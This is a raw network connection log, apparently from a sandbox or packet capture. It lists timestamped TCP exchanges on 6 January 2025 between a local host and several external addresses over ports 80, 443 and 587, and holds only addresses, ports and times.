Jan 6, 2025 07:58:16.263075113 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:16.264671087 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:16.264688969 CET	443	49751	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:16.264944077 CET	443	49751	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:16.266263962 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:16.311336994 CET	443	49751	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:16.389931917 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:16.394079924 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:16.399008036 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:16.510360003 CET	443	49751	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:16.510426998 CET	443	49751	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:16.510493040 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:16.519702911 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:16.607877016 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:16.770857096 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:16.971652031 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:16.971705914 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:16.971781015 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:16.983264923 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:16.983282089 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:17.443430901 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:17.443528891 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:17.445152044 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:17.445173025 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:17.445450068 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:17.490252972 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:17.514169931 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:17.555336952 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:17.624887943 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:17.624950886 CET	443	49756	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:17.625494003 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:17.628101110 CET	49756	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:17.638225079 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:17.643074989 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:17.851861954 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:18.044461012 CET	49758	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:18.044519901 CET	443	49758	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:18.048425913 CET	49758	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:18.052212954 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:18.055511951 CET	49758	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:18.055536985 CET	443	49758	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:18.511593103 CET	443	49758	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:18.519946098 CET	49758	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:18.519979000 CET	443	49758	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:18.640845060 CET	443	49758	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:18.640902996 CET	443	49758	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:18.640960932 CET	49758	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:18.641372919 CET	49758	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:18.644941092 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:18.646115065 CET	49760	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:18.649924040 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:18.649971962 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:18.650943041 CET	80	49760	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:18.651017904 CET	49760	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:18.651109934 CET	49760	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:18.655853033 CET	80	49760	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:19.345253944 CET	80	49760	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:19.346410990 CET	49762	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:19.346448898 CET	443	49762	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:19.346513987 CET	49762	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:19.346755981 CET	49762	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:19.346769094 CET	443	49762	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:19.481026888 CET	49760	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:19.811460972 CET	443	49762	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:19.820708990 CET	49762	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:19.820729971 CET	443	49762	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:19.964063883 CET	443	49762	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:19.964118958 CET	443	49762	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:19.964267969 CET	49762	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:19.964581013 CET	49762	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:20.007168055 CET	49763	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:20.014628887 CET	80	49763	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:20.014972925 CET	49763	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:20.015105963 CET	49763	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:20.021851063 CET	80	49763	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:20.705001116 CET	80	49763	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:20.715964079 CET	49764	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:20.716012955 CET	443	49764	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:20.716110945 CET	49764	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:20.719927073 CET	49764	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:20.719944000 CET	443	49764	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:20.790843010 CET	49763	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:21.177977085 CET	443	49764	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:21.180144072 CET	49764	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:21.180239916 CET	443	49764	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:21.308301926 CET	443	49764	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:21.308357000 CET	443	49764	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:21.308553934 CET	49764	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:21.308839083 CET	49764	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:21.330688000 CET	49763	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:21.335683107 CET	80	49763	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:21.335762978 CET	49763	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:21.361980915 CET	49765	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:21.366832972 CET	80	49765	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:21.366974115 CET	49765	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:21.367374897 CET	49765	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:21.372193098 CET	80	49765	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:22.041636944 CET	80	49765	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:22.042869091 CET	49760	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.043426991 CET	49766	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:22.043473959 CET	443	49766	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:22.043538094 CET	49766	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:22.043792009 CET	49766	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:22.043807983 CET	443	49766	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:22.178672075 CET	49765	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.529016018 CET	443	49766	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:22.532577038 CET	49766	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:22.532617092 CET	443	49766	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:22.565215111 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.570091009 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:22.570152998 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.570384979 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.575229883 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:22.676968098 CET	443	49766	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:22.677028894 CET	443	49766	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:22.677082062 CET	49766	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:22.677455902 CET	49766	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:22.680749893 CET	49765	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.681770086 CET	49768	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.685709000 CET	80	49765	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:22.685801983 CET	49765	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.686630964 CET	80	49768	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:22.686696053 CET	49768	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.686861992 CET	49768	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:22.691639900 CET	80	49768	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:23.252554893 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:23.256588936 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:23.261425972 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:23.382644892 CET	80	49768	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:23.383805990 CET	49769	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:23.383860111 CET	443	49769	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:23.383938074 CET	49769	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:23.384191036 CET	49769	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:23.384207964 CET	443	49769	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:23.474688053 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:23.489311934 CET	49768	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:23.645596981 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:23.765254021 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:23.770122051 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:23.770185947 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:23.839140892 CET	443	49769	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:23.840730906 CET	49769	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:23.840764046 CET	443	49769	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:23.983696938 CET	443	49769	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:23.983783007 CET	443	49769	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:23.983829975 CET	49769	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:23.984146118 CET	49769	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:23.989653111 CET	49768	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:23.990818024 CET	49771	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:23.994647026 CET	80	49768	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:23.994709969 CET	49768	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:23.995692968 CET	80	49771	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:23.995752096 CET	49771	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:23.995826960 CET	49771	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:24.000672102 CET	80	49771	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:24.138784885 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.138827085 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.138966084 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.152682066 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.152702093 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.308244944 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.311194897 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:24.316065073 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.458218098 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.460542917 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:24.465404034 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.610991001 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.611052990 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.615154982 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.615180016 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.615511894 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.615736961 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.617240906 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:24.622104883 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.661217928 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.672609091 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.719330072 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.720273018 CET	80	49771	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:24.721513987 CET	49773	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.721568108 CET	443	49773	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.721638918 CET	49773	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.721869946 CET	49773	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.721880913 CET	443	49773	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.770587921 CET	49771	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:24.779256105 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.779335976 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.779350042 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.779361963 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.779373884 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.779381037 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.779398918 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:24.779448986 CET	443	49772	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:24.779453993 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:24.780402899 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.785142899 CET	49772	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:24.792794943 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:24.794958115 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:24.797719955 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:24.799789906 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.943702936 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:24.947897911 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:24.952855110 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.003606081 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:25.006462097 CET	49774	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.006506920 CET	443	49774	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.006583929 CET	49774	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.006827116 CET	49774	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.006839991 CET	443	49774	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.051856995 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.095485926 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.110429049 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:25.115330935 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.206083059 CET	443	49773	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.215468884 CET	49773	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.215500116 CET	443	49773	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.257509947 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.260938883 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:25.265820026 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.347512007 CET	443	49773	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.347575903 CET	443	49773	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.347644091 CET	49773	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.348048925 CET	49773	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.351030111 CET	49771	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.351973057 CET	49775	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.356075048 CET	80	49771	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:25.356523037 CET	49771	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.356770039 CET	80	49775	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:25.356833935 CET	49775	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.356904030 CET	49775	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.361740112 CET	80	49775	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:25.415146112 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.416518927 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:25.421364069 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.460707903 CET	443	49774	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.468631983 CET	49774	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.468657017 CET	443	49774	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.564501047 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.564785957 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:25.569663048 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.633142948 CET	443	49774	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.633208990 CET	443	49774	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:25.633302927 CET	49774	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.633769989 CET	49774	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:25.636816978 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.638040066 CET	49776	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.641796112 CET	80	49767	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:25.641858101 CET	49767	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.642884970 CET	80	49776	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:25.642942905 CET	49776	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.643034935 CET	49776	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:25.647806883 CET	80	49776	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:25.714229107 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.717140913 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:25.722022057 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.869242907 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:25.869551897 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:25.874404907 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.022102118 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.022344112 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:26.027254105 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.028424978 CET	80	49775	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:26.029479980 CET	49777	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.029532909 CET	443	49777	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.029632092 CET	49777	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.029845953 CET	49777	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.029860973 CET	443	49777	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.083143950 CET	49775	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.190654039 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.196785927 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:26.196917057 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:26.197138071 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:26.197166920 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:26.197205067 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:26.201700926 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.201913118 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.201976061 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.201997042 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.202058077 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.202132940 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.333726883 CET	80	49776	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:26.335169077 CET	49778	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.335232973 CET	443	49778	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.335309982 CET	49778	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.335611105 CET	49778	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.335623980 CET	443	49778	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.362287045 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:26.379981995 CET	49776	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.411250114 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:26.484035015 CET	443	49777	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.485721111 CET	49777	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.485743046 CET	443	49777	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.621398926 CET	443	49777	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.621476889 CET	443	49777	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.621710062 CET	49777	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.621941090 CET	49777	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.624720097 CET	49775	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.625839949 CET	49779	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.629784107 CET	80	49775	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:26.629858017 CET	49775	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.630655050 CET	80	49779	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:26.630734921 CET	49779	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.630844116 CET	49779	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.635597944 CET	80	49779	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:26.793514967 CET	443	49778	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.794945002 CET	49778	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.794986963 CET	443	49778	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.923140049 CET	443	49778	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.923202991 CET	443	49778	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:26.923243999 CET	49778	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.923686028 CET	49778	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:26.928627968 CET	49780	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.933501959 CET	80	49780	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:26.933603048 CET	49780	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.933778048 CET	49780	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:26.938544989 CET	80	49780	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:27.311961889 CET	80	49779	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:27.314553022 CET	49781	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.314615965 CET	443	49781	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.314743996 CET	49781	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.314941883 CET	49781	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.314958096 CET	443	49781	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.364419937 CET	49779	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:27.623044968 CET	80	49780	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:27.624351978 CET	49782	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.624403954 CET	443	49782	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.624502897 CET	49782	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.624751091 CET	49782	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.624766111 CET	443	49782	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.676875114 CET	49780	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:27.768996000 CET	443	49781	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.771009922 CET	49781	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.771038055 CET	443	49781	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.919465065 CET	443	49781	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.919555902 CET	443	49781	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:27.919615984 CET	49781	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.920017958 CET	49781	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:27.949214935 CET	49779	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:27.949882030 CET	49783	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:27.949922085 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:27.949985027 CET	49783	443	192.168.2.4	149.154.167.220
